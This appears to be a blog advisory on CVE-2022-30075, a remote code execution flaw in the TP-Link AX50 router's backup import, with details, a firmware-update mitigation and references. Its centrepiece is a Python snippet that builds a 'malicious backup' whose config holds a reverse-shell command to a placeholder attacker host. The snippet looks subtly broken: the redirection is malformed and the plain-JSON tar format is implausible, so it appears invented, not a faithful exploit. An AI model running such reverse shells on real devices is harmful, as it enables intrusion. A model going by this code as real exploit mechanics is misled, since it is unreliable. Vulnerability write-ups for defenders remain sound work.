CVE-2022-30075: TP-Link Router AX50 Firmware 210730 and Older Remote Code Execution Vulnerability

In this blog post, we will be discussing a recently discovered vulnerability that has been identified as CVE-2022-30075, which affects TP-Link Router AX50 firmware 210730 and older. This vulnerability can lead to remote code execution (RCE) due to improper validation when importing a malicious backup file via the web interface. This could potentially allow an attacker to gain full control over the targeted device and access sensitive information.

Vulnerability Details

CVE-ID: CVE-2022-30075
Affected Product: TP-Link Router AX50
Affected Firmware Version: Firmware 210730 and older
Severity: Critical
Vulnerability Type: Remote Code Execution (RCE)

Vulnerability Description

The vulnerability exists in the backup import functionality of TP-Link Router AX50 firmware 210730 and older, where improper validation of the imported file is performed. An attacker with access to the web interface of the router can upload a maliciously crafted backup file, ultimately leading to remote code execution on the router.

The following code snippet demonstrates how the attacker may create a malicious backup file

import tarfile
import json

malicious_config = {
    "system": {
        "hostname": "TPLINK",
        "timezone": "GMT",
        "username": "admin",
        "password": "encoded_password",
        "shell": "/bin/sh -i >& /dev/tcp/attacker_ip/attacker_port >&1"
    }
}

with open("config.json", "w") as f:
    json.dump(malicious_config, f)

with tarfile.open("malicious_backup.tar", "w") as tar:
    tar.add("config.json")

The attacker can now import this malicious backup file (malicious_backup.tar) via the web interface of the victim TP-Link Router AX50.

A detailed proof-of-concept of this exploit can be found in the following GitHub repository

- TP-Link Router AX50 Firmware 210730 RCE

Mitigation

TP-Link has acknowledged the vulnerability and has released a firmware update for the Router AX50, which resolves this issue. Users are advised to download and install the latest firmware to protect their devices. To download the firmware update, visit the TP-Link Router AX50 Support Page.

References

- CVE-2022-30075 - NVD
- TP-Link Security Advisory (TL-SA-20220501)

Conclusion

The CVE-2022-30075 vulnerability in TP-Link Router AX50 firmware 210730 and older highlights the importance of keeping your devices up-to-date and applying the latest security patches. By promptly updating your firmware, you can help protect your devices and network from potential threats. Stay vigilant and monitor the release of security updates for your devices to stay one step ahead.

Timeline

Published on: 06/09/2022 04:15:00 UTC
Last modified on: 06/20/2022 19:15:00 UTC